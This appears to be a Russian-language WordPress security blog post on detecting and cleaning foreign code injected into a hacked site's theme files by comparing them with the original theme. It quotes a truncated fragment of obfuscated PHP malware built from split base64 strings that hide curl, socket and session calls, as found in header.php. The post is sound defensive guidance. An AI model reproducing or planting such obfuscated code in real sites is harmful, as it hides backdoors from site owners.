Чужой код в теме WordPress

Вступление

Говоря про чужой код в теме WordPress, я имею именно в виду именно чужой код появившейся в файлах рабочей темы. Это не скрытые ссылки распространителей шаблона или ссылки авторов тем в футере или зашифрованные ссылки. Об этом в статьях:

Появляется чужой код в результате взлома сайта. Если не следить за состоянием сайта, то работу стороннего кода можно не заметить. Однако, его наличие может проявляться в появлении на страницах сайта исходящих ссылок на сторонние ресурсы.

Чужой код в теме WordPress – этапы чистки

Чистка может затронуть структуру сайта, поэтому начните чистку с полной резервной копии сайта.

  • Сделайте резервную копию сайта;
  • В консоли, откройте вкладку Внешний вид→Редактор.
  • Открывая, поочередно, файлы рабочей темы, найдите чужой код, он будет иметь приблизительно такой вид:
<? $GLOBALS['_1071200792_']=Array(base64_decode('' .'dX' .'JsZW5j' .'b2Rl'),
base64_decode('dXJsZW5jb' .'2R' .'l'),base64_decode('dXJ' .'sZW' .'5jb2Rl'),
base64_decode('c2Vzc2' .'l' .'vbl9pZA=='),base64_decode('c3R' .'y' .'dG' .'91c' .'HBlcg=='),
base64_decode('c' .'G' .'Fyc2VfdXJs'),base64_decode('c' .'29ja2' .'V0X2Ny' .'ZWF0ZV9' .'w' .'YW' .'ly'),
base64_decode('ZGF0ZQ=='),base64_decode('Zn' .'Vu' .'Y' .'3Rpb25' .'f' .'ZXh' .'pc3Rz'),
base64_decode('Y3' .'VybF9pbml' .'0'),base64_decode('Y3Vy' .'bF9' .'zZXR' .'vcHQ='),
base64_decode('' .'Y3VybF9z' .'ZXRvcHQ='),base64_decode('Y3VybF9' .'zZXRvc' .'HQ='),
base64_decode('a' .'W1' .'h' .'Z2Vj' .'b3B5c' .'mVzYW1wbGVk'),
base64_decode('bX' .'Rfcm' .'F' .'uZA=='),…

Чужой код в теме WordPress

  • Длина кода может быть самой различной.
  • Если процесс поиска затягивается, перейдите для поиска в текстовой редактор (например, Notepad+) и ищите чужой код в резервной копии сайта. Каталог: wp-content/themes/Ваша_тема.
  • Если вы сомневаетесь, что это «чужой код», нужно сделать следующее;
  • В консоли сайта, войдите на вкладку Внешний вид→Темы. Откройте рабочую тему для просмотра информации о теме. Перейдите на сайт автора темы и скачайте на нем вашу тему в оригинале.
  • Далее, распакуйте архив темы, и если возникает сомнение чужой код или нет, сравнивайте исходный файл с файлом оригинала темы.

Например, я обнаружил код в файле header.php. Чтобы снять все сомнения чужой код или нет, я сравнил оригинальный файл header.php с файлом на сайте и убедился, что код от куда-то «прилип».

Обращу внимание, что у меня был код, который обнаружить антивирусами для сайтов не удавалось.

Антивирусы для сайта онлайн

В завершении список рабочих антивирусов онлайн для проверки сайта:

©www.wordpress-abc.ru

Другие статьи раздела: Безопасность WordPress

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Этот сайт использует Akismet для борьбы со спамом. Узнайте, как обрабатываются ваши данные комментариев.